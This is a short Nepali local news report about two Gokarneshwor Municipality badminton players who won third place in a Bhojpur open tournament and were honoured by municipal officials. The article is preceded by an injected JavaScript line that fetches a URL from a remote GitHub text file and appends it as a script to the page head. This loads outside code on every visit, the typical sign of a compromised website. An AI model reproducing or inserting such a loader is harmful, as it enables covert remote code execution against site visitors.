;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, भोजपुर |
साल्पासिलिछो गाउँपालिका भोजपुर द्वारा मिति २०७७चैत ८ गते देखि १३ गते सम्म भएको खुल्ला ब्याडमिन्टन प्रतियोगितामा गोकर्णेश्वर नगरपालिकाबाट राजन श्रेष्ठ र डम्बर बहदुर तमाङ को जोडिले तृतीय स्थान हात पार्न सफल भएको छन् |
बिजेता खेलाडीहरुलाई गोकर्णश्वोर नगरपालिकाले सम्मान गरेको छ | आज काठमाडौँको जोरपाटीमा एक कार्यक्रम गरि नगर प्रमुख सन्तोष चालिसे ,उपप्रमुख शान्ति नेपाल ,वडा न १ का वडा अध्यक्ष राम मानन्धर, नगर खेलकुद विकास समिति अध्यक्ष सन्जय लामा र नगर ब्याडमिन्टन संयोजन सरोज बहादुर पुडासैनीको उपस्थित बीच भब्य रुपमा आज नगरपालिकाको तर्फबाट सम्मान गरिएको हो ।
फेसबुक प्रतिक्रियाहरु